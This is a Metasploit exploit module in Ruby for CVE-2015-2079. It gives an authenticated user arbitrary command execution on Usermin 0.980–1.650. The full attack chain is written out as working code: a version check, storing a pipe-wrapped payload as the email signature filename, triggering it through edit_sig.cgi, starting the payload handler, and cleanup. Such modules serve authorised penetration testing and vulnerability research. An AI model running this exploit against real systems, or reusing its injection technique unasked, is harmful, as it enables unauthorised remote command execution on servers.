##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
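class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Usermin answers with a "MiniServ" Server header; the framework uses this
  # pattern to skip hosts that are obviously not Usermin/Webmin before check/exploit.
  HttpFingerprint = { :pattern => [ /MiniServ/ ] }

  include Msf::Exploit::Remote::HttpClient

  # Inclusive version range the advisory (CVE-2015-2079) lists as affected.
  VULN_VERSION_MIN = '0.980'
  VULN_VERSION_MAX = '1.650'

  # Module metadata and user options (USERNAME/PASSWORD are required because the
  # bug is only reachable by an authenticated Usermin user).
  def initialize(info={})
    super(update_info(info,
      'Name' => "Usermin 0.980-1.650 Authenticated Arbitrary Command Execution",
      'Description' => %q{
        This modules exploits a vulnerability found in Usermin, version 0.980 up to
        1.650. As an authenticated user, arbitrary command execution is possible by
        manipulating the filename of an email signature file and triggering a function
        to display the signature.
        Payload hint: cmd/unix/*perl* works best because Usermin is based on Perl :-)
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'David Elze < david.elze@code-white.com >' # Discovery & this simple MSF module
        ],
      'References' =>
        [
          [ 'CVE', '2015-2079' ],
          [ 'URL', 'http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html'],
        ],
      'Arch' => ARCH_CMD,
      'Platform' => ['unix'],
      'BadChars' => "",
      'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl bash'
        },
      'Targets' =>
        [
          ['Usermin 0.980-1.650 on Linux', {}],
        ],
      'DisclosureDate' => "Feb 23 2015",
      'DefaultTarget' => 0,
      'DefaultOptions' =>
        {
          'RPORT' => 20000
        }))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'Usermin username', '']),
        OptString.new('PASSWORD', [ true, 'Usermin password', '']),
        OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/'])
      ], self.class)
  end

  # Unauthenticated version check: scrape "Usermin <version>" from the login page.
  #
  # Returns CheckCode::Appears when the banner version is inside the affected
  # range, CheckCode::Safe when it is outside, and CheckCode::Unknown when the
  # host did not answer or no version banner was found (the original code
  # crashed on a nil response and reported "Safe" for an unparseable banner).
  def check
    uri = normalize_uri(target_uri.path)
    uri += '/' unless uri.end_with?('/')

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri
    })

    unless res && res.body
      vprint_error("No HTTP response from #{uri}")
      return Exploit::CheckCode::Unknown
    end

    ver = res.body.scan(/Usermin ([\.0-9]+)/).flatten.first
    if ver.nil?
      vprint_status("No Usermin version banner found in the response")
      return Exploit::CheckCode::Unknown
    end

    vprint_status("Usermin version #{ver} detected")
    if is_version_vulnerable?(ver)
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # True when +ver+ (a version string such as "1.640") lies within
  # VULN_VERSION_MIN..VULN_VERSION_MAX inclusive.
  #
  # nil, blank or malformed input yields false instead of being silently
  # treated as version "0" (which is what Gem::Version.new would do).
  def is_version_vulnerable?(ver)
    return false if ver.nil? || ver.to_s.strip.empty?
    return false unless Gem::Version.correct?(ver)

    version = Gem::Version.new(ver)
    version >= Gem::Version.new(VULN_VERSION_MIN) && version <= Gem::Version.new(VULN_VERSION_MAX)
  end

  # 1. Store "|<payload>|" as the user's "free" signature filename via
  #    uconfig_save.cgi.
  # 2. Open the signature editor (mailbox/edit_sig.cgi), which makes Usermin
  #    open that "filename" and thereby run the command.
  # 3. Reset the signature setting so the malicious entry does not remain in
  #    the user's config (the reset now runs in an +ensure+, so it also happens
  #    when step 2 fails or the handler is interrupted).
  #
  # Raises Msf::Exploit::Failed (via fail_with) on any unexpected reply.
  def exploit
    auth = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
    base = base_url

    print_status("Storing the malicious signature filename via uconfig_save.cgi ...")
    # The pipe characters around the payload are the injection: the stored
    # "filename" is later handed to Perl's open(), which treats "|cmd|" as a
    # command to run rather than a file to read.
    res = save_signature_file("|#{payload.encoded}|", auth, base)
    ensure_config_saved(res)

    cleaned_up = false
    begin
      print_status("Calling the command via mailbox/edit_sig.cgi ...")
      res = send_request_raw({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path, 'mailbox/edit_sig.cgi'),
        'authorization' => auth,
        'headers'       => {
          'Referer' => "#{base}left.cgi?mail=1"
        }
      })
      fail_with(Failure::Unreachable, "No response from mailbox/edit_sig.cgi") unless res
      fail_with(Failure::NoAccess, "Authentication failed (HTTP 401) at mailbox/edit_sig.cgi") if res.code == 401
      unless res.code == 200
        fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} from mailbox/edit_sig.cgi")
      end

      handler
    ensure
      # Always restore the signature setting: otherwise "|payload|" stays in the
      # user's Usermin config (and, per the description, would run again each
      # time the signature is displayed) even when the trigger request failed.
      print_status("Cleaning up by unsetting the Signature file...")
      cleaned_up = unset_signature_file(auth, base)
    end

    if cleaned_up
      print_status("...done.")
    else
      fail_with(Failure::Unknown,
        "Could not unset the signature file; remove the '|...|' sig_file_free entry from the user's Usermin mailbox config manually")
    end
  end

  private

  # Base URL of the Usermin instance with a guaranteed trailing slash, so that
  # "#{base}uconfig.cgi" is well-formed even when TARGETURI lacks a trailing '/'.
  # Every request below sets a Referer derived from it; presumably this is to
  # satisfy Usermin's referer check, but that is not verifiable from here.
  def base_url
    scheme = datastore['SSL'] ? 'https' : 'http'
    path = normalize_uri(target_uri.path)
    path += '/' unless path.end_with?('/')
    "#{scheme}://#{rhost}:#{rport}#{path}"
  end

  # POST the mailbox module's signature settings to uconfig_save.cgi.
  # +sig_file+ is the preset selector ('free' = use the path in +sig_file_free+;
  # '*' is what the cleanup sends to unset it). Returns the response or nil.
  def post_signature_config(sig_file, sig_file_free, auth, base)
    send_request_cgi({
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri.path, 'uconfig_save.cgi'),
      'authorization' => auth,
      'headers'       => {
        'Referer' => "#{base}uconfig.cgi?module=mailbox&section=line1"
      },
      'vars_post'     => {
        'module'        => "mailbox",
        'sig_file'      => sig_file,
        'sig_file_free' => sig_file_free,
        'sig_mode'      => "0",
        'save'          => "Save"
      }
    })
  end

  # Store +filename+ as the user's free-form signature file path.
  def save_signature_file(filename, auth, base)
    post_signature_config("free", filename, auth, base)
  end

  # Reset the signature file setting. Returns true when Usermin answered with
  # the 302 redirect it sends after a successful save, false otherwise
  # (never raises, so it is safe to call from an +ensure+ block).
  def unset_signature_file(auth, base)
    res = post_signature_config("*", "", auth, base)
    return true if res && res.code == 302

    print_error("Unsetting the signature file failed (#{res ? "HTTP #{res.code}" : 'no response'})")
    false
  end

  # Abort with a descriptive failure unless +res+ is the 302 redirect that
  # uconfig_save.cgi returns after a successful save.
  def ensure_config_saved(res)
    fail_with(Failure::Unreachable, "No response from uconfig_save.cgi") unless res
    fail_with(Failure::NoAccess, "Authentication failed (HTTP 401) at uconfig_save.cgi") if res.code == 401
    return if res.code == 302

    fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} from uconfig_save.cgi")
  end
end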